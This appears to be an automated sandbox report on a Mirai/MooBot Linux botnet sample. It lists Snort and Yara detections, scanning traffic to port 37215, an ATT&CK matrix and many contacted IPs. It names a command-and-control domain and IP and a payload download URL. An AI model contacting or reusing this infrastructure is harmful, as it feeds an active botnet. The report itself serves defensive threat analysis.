                  Source: unknownNetwork traffic detected: HTTP traffic on port 51834 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34052 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33324 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47520 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57466 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56420 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38656 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51710 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60084 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47828 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42704 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55334 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41724 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50742 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56236 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34872 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37846 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44816 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48700 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59148 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43426 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59454 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37294 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33510 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39928 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33734 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41630 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43240 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35708 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33614 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60982 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58612 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58032 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60702 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33186 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38134 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58802 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46814 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43836 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34414 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58090 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34368 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36682 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46724 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56494 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38300 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42758 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38052 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38072 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54370 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43944 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38472 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51564 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40624 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47126 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54118 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45128 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50814 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55368 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45452 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41456 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37186 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38032 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44364 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44170 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44800 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58342 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59970 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47844 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34740 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41444 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46170 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41526 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50624 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60156 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41370 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47532 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42366 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33410 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35462 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33812 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43332 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49000 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50768 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37140 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58788 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34896 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53438 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50814 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48978 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35866 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46082 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35550 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33868 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38974 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57126 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59352 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44204 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54646 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42618 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42504 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56672 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47126 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48342 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57086 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47408 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39488 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32914 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38594 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48936 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42124 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33192 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34710 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41232 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40334 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50628 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34982 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57628 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47120 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52806 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50744 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56370 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52896 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57322 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47026 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60128 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57396 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36708 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56530 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33070 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60190 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46520 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48016 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34496 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36930 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48590 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39162 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41768 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37834 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42542 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48116 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49048 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36394 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39770 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45716 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37446 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60656 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40898 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48972 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60392 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53802 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55770 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37080 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51198 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54510 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58490 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33692 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60216 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52882 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38398 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44092 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53438 -> 37215
                  Source: /usr/bin/xfdesktop (PID: 6221)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 6227)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 6230)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 6233)Queries kernel information via 'uname': Jump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: KlgUGKamBf.elf, type: SAMPLE
                  Source: Yara matchFile source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: KlgUGKamBf.elf, type: SAMPLE
                  Source: Yara matchFile source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTR
                  Source: Yara matchFile source: KlgUGKamBf.elf, type: SAMPLE
                  Source: Yara matchFile source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                  Source: Yara matchFile source: KlgUGKamBf.elf, type: SAMPLE
                  Source: Yara matchFile source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: KlgUGKamBf.elf, type: SAMPLE
                  Source: Yara matchFile source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTR
                  Source: Yara matchFile source: KlgUGKamBf.elf, type: SAMPLE
                  Source: Yara matchFile source: 6207.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: KlgUGKamBf.elf PID: 6207, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Scripting
                  Path Interception1
                  Hidden Files and Directories
                  1
                  OS Credential Dumping
                  1
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448335 Sample: KlgUGKamBf.elf Startdate: 28/05/2024 Architecture: LINUX Score: 100 26 197.53.119.215 TE-ASTE-ASEG Egypt 2->26 28 41.152.25.4 ETISALAT-MISREG Egypt 2->28 30 99 other IPs or domains 2->30 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 8 other signatures 2->38 8 KlgUGKamBf.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 xfce4-session xfdesktop 2->12         started        14 4 other processes 2->14 signatures3 process4 process5 16 KlgUGKamBf.elf 8->16         started        process6 18 KlgUGKamBf.elf 16->18         started        20 KlgUGKamBf.elf 16->20         started        22 KlgUGKamBf.elf 16->22         started        24 KlgUGKamBf.elf 16->24         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  KlgUGKamBf.elf53%ReversingLabsLinux.Trojan.Mirai
                  KlgUGKamBf.elf100%AviraEXP/ELF.Mirai.Z.A
                  KlgUGKamBf.elf100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://103.177.35.32/tajma.mpsl;0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cnc.bobungbu.com
                  103.177.35.32
                  truetrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://103.177.35.32/tajma.mpsl;KlgUGKamBf.elffalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/encoding/KlgUGKamBf.elffalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/envelope/KlgUGKamBf.elffalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    197.33.61.26
                    unknownEgypt
                    8452TE-ASTE-ASEGfalse
                    197.2.84.155
                    unknownTunisia
                    37705TOPNETTNfalse
                    142.13.225.201
                    unknownCanada
                    16796MERLIN-NETCAfalse
                    140.192.156.253
                    unknownUnited States
                    20130DEPAULUSfalse
                    205.204.216.144
                    unknownUnited States
                    10921KIHNETWORKUSfalse
                    39.49.207.50
                    unknownPakistan
                    45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
                    198.159.215.0
                    unknownUnited States
                    3369MCI-ASNUSfalse
                    19.170.105.124
                    unknownUnited States
                    3MIT-GATEWAYSUSfalse
                    200.193.105.23
                    unknownBrazil
                    8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                    197.237.201.146
                    unknownKenya
                    15399WANANCHI-KEfalse
                    74.155.237.205
                    unknownUnited States
                    7922COMCAST-7922USfalse
                    75.91.102.40
                    unknownUnited States
                    7029WINDSTREAMUSfalse
                    197.12.117.144
                    unknownTunisia
                    37703ATLAXTNfalse
                    138.236.250.77
                    unknownUnited States
                    17234GACUSfalse
                    182.168.114.71
                    unknownJapan2527SO-NETSo-netEntertainmentCorporationJPfalse
                    31.212.1.217
                    unknownGermany
                    3320DTAGInternetserviceprovideroperationsDEfalse
                    116.63.31.224
                    unknownChina
                    4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                    124.233.125.255
                    unknownChina
                    4809CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarrfalse
                    41.237.139.178
                    unknownEgypt
                    8452TE-ASTE-ASEGfalse
                    57.95.244.185
                    unknownBelgium
                    51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                    157.148.128.77
                    unknownChina
                    17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                    180.38.220.54
                    unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                    157.243.120.22
                    unknownFrance
                    25789LMUUSfalse
                    151.58.79.56
                    unknownItaly
                    1267ASN-WINDTREIUNETEUfalse
                    89.186.17.204
                    unknownPoland
                    42667INTEREVO-PL-ASPLfalse
                    173.69.91.226
                    unknownUnited States
                    701UUNETUSfalse
                    180.108.20.0
                    unknownChina
                    137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                    186.193.167.42
                    unknownBrazil
                    53137TCAInternetBRfalse
                    150.138.20.215
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    163.196.226.120
                    unknownSouth Africa
                    17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                    50.144.231.87
                    unknownUnited States
                    7922COMCAST-7922USfalse
                    49.168.204.187
                    unknownKorea Republic of
                    17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                    2.237.115.11
                    unknownItaly
                    12874FASTWEBITfalse
                    163.146.167.42
                    unknownJapan17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                    96.102.137.65
                    unknownUnited States
                    7922COMCAST-7922USfalse
                    113.201.127.193
                    unknownChina
                    4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                    117.32.10.187
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    197.54.233.192
                    unknownEgypt
                    8452TE-ASTE-ASEGfalse
                    62.246.7.52
                    unknownGermany
                    12312ECOTELDEfalse
                    157.143.40.240
                    unknownUnited States
                    16922OUHSC-EDUUSfalse
                    157.152.173.162
                    unknownUnited States
                    719ELISA-ASHelsinkiFinlandEUfalse
                    50.212.120.64
                    unknownUnited States
                    7922COMCAST-7922USfalse
                    9.234.214.163
                    unknownUnited States
                    3356LEVEL3USfalse
                    67.194.232.131
                    unknownUnited States
                    36375UMICH-AS-5USfalse
                    223.148.241.41
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    126.193.47.106
                    unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                    148.193.54.242
                    unknownUnited States
                    18819ENTERGY-CORP-USfalse
                    41.155.61.123
                    unknownunknown
                    37079SMMTZAfalse
                    197.173.131.62
                    unknownSouth Africa
                    37168CELL-CZAfalse
                    197.202.110.221
                    unknownAlgeria
                    36947ALGTEL-ASDZfalse
                    157.176.208.130
                    unknownUnited States
                    22192SSHENETUSfalse
                    220.185.48.232
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    197.240.242.12
                    unknownunknown
                    37705TOPNETTNfalse
                    99.142.181.93
                    unknownUnited States
                    7018ATT-INTERNET4USfalse
                    151.225.253.121
                    unknownUnited Kingdom
                    5607BSKYB-BROADBAND-ASGBfalse
                    24.178.88.162
                    unknownUnited States
                    20115CHARTER-20115USfalse
                    197.53.119.215
                    unknownEgypt
                    8452TE-ASTE-ASEGtrue
                    219.126.95.139
                    unknownJapan10010TOKAITOKAICommunicationsCorporationJPfalse
                    163.54.129.89
                    unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                    12.107.230.163
                    unknownUnited States
                    12261DEKALBUSfalse
                    14.227.186.147
                    unknownViet Nam
                    45899VNPT-AS-VNVNPTCorpVNfalse
                    184.185.191.59
                    unknownUnited States
                    22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                    223.72.208.211
                    unknownChina
                    56048CMNET-BEIJING-APChinaMobileCommunicaitonsCorporationCNfalse
                    199.19.201.89
                    unknownUnited States
                    27589MOJOHOSTUSfalse
                    40.84.1.39
                    unknownUnited States
                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    197.255.157.211
                    unknownSouth Africa
                    15022ADEPT-ZAfalse
                    9.208.238.196
                    unknownUnited States
                    3356LEVEL3USfalse
                    119.204.20.142
                    unknownKorea Republic of
                    4766KIXS-AS-KRKoreaTelecomKRfalse
                    37.88.51.27
                    unknownGermany
                    3320DTAGInternetserviceprovideroperationsDEfalse
                    41.35.57.91
                    unknownEgypt
                    8452TE-ASTE-ASEGfalse
                    197.219.199.182
                    unknownMozambique
                    37342MOVITELMZfalse
                    54.103.213.60
                    unknownUnited States
                    16509AMAZON-02USfalse
                    48.225.193.76
                    unknownUnited States
                    2686ATGS-MMD-ASUSfalse
                    83.7.65.17
                    unknownPoland
                    5617TPNETPLfalse
                    41.152.25.4
                    unknownEgypt
                    36992ETISALAT-MISREGtrue
                    134.23.106.134
                    unknownUnited States
                    10702INL-ASUSfalse
                    96.199.193.112
                    unknownUnited States
                    7922COMCAST-7922USfalse
                    197.2.121.110
                    unknownTunisia
                    37705TOPNETTNfalse
                    37.173.87.182
                    unknownFrance
                    51207FREEMFRfalse
                    114.8.70.47
                    unknownIndonesia
                    56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
                    197.130.113.40
                    unknownMorocco
                    6713IAM-ASMAfalse
                    197.167.97.219
                    unknownEgypt
                    24863LINKdotNET-ASEGfalse
                    82.209.199.169
                    unknownBelarus
                    6697BELPAK-ASBELPAKBYfalse
                    158.214.72.196
                    unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                    197.179.81.200
                    unknownKenya
                    33771SAFARICOM-LIMITEDKEfalse
                    66.9.44.49
                    unknownUnited States
                    18885M2NGAGE2USfalse
                    197.33.61.65
                    unknownEgypt
                    8452TE-ASTE-ASEGfalse
                    178.150.12.140
                    unknownUkraine
                    13188TRIOLANUAfalse
                    194.233.145.171
                    unknownGermany
                    6659NEXINTO-DEfalse
                    157.77.107.238
                    unknownJapan4678FINECanonITSolutionsIncJPfalse
                    37.209.221.4
                    unknownUnited Kingdom
                    31463FOURD-ASGBfalse
                    124.31.170.52
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    157.120.16.151
